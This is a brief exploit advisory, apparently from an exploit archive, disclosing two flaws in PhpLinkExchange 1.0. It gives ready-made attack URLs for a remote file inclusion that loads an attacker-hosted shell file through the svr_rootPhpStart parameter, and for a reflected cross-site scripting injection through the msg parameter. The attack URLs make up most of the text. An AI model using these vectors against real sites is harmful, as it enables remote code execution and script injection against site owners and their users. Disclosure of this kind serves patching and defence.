id: 816
date: 09/10/2006
title: PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities
author: s3rv3r_hack3r
cves: 

========================================================
PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities
========================================================



By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

remote file include :

http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]

xss:

http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]



#  0day.today [2023-03-25]  #